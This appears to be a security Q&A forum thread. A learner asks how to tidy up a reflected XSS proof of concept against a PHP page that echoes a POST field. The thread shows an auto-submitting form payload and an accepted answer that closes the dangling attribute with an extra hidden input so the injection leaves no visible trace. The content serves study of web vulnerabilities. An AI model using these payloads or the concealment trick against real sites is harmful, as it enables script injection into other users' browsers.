XSS PoC: Hide Rendered Characters in DOM

391 views Asked by At

I've started playing with XSS to better improve my security posture at work. I've been able to successfully exploit a reflected XSS attack using a redirected POST form, but I can't seem to remove the extraneous characters displayed on the page.

I've checked:

XSS: Character showing in DOM

https://security.stackexchange.com/questions/207282/xss-character-showing-in-dom?newreg=61e9890d94d34d0c8818158ba541b117

How to load javascript on another webpage through XSS?

But none of the suggestions seem to work for me.

My exploit is a basic form, exploiting a PHP server side script I've configured echoing $_POST['username'] into the value attribute:

<form id=1 method="post" action="http://vulnerable.site.com">
    <input type="hidden" name="username"
    value="&quot;&gt;&lt;script&gt;alert('Hello');&lt;/script&gt;&quot;">
</form>
<script>
    document.getElementById(1).submit();
</script>

Unencoded:

<form id=1 method="post" action="http://vulnerable.site.com">
    <input type="hidden" name="username"
    value=""><script>alert('Hello');</script>">
</form>
<script>
    document.getElementById(1).submit();
</script>

But this pesky "> will not die:

Extra characters rendered

I've tried:

  • Several filter evasion techniques by adding additional characters recommended by OWASP
  • Escaping the "> to &quot;&gt; - this results in syntax errors, and removing the leading quotes breaks the payload. BUT, based on resources linked above, it seems possible based on comments
  • Using CSS selectors to hide the characters in my attack payload (using dev tools, the "> shows up as #text so I thought this might work)

I'm sure it's something silly, but what am I missing? It's clearly possible, but I'm not a skilled web developer (hence the fiddling around). Any feedback or advice would be appreciated!

1

There are 1 answers

0
FuegoJohnson On BEST ANSWER

I eventually figured it out after hours of trial and error. The idea is to close the dangling tag with a separate tag:

So the previous payload was:

"><script>alert('Hello');</script>

Which, after the PHP script parses it, looks like this:

<input type="text" name="username" value="">"> <!-- notice the dangling tag -->

After adding a closing input tag, the solution worked:

"><script>alert('Hello');</script><input type="hidden" value="

And output from PHP parsing:

<input type="text" name="username" value=""><script>alert('Hello');</script><input type="hidden" value="">

Note that the above needs to be HTML encoded to work properly. I omitted it for readability.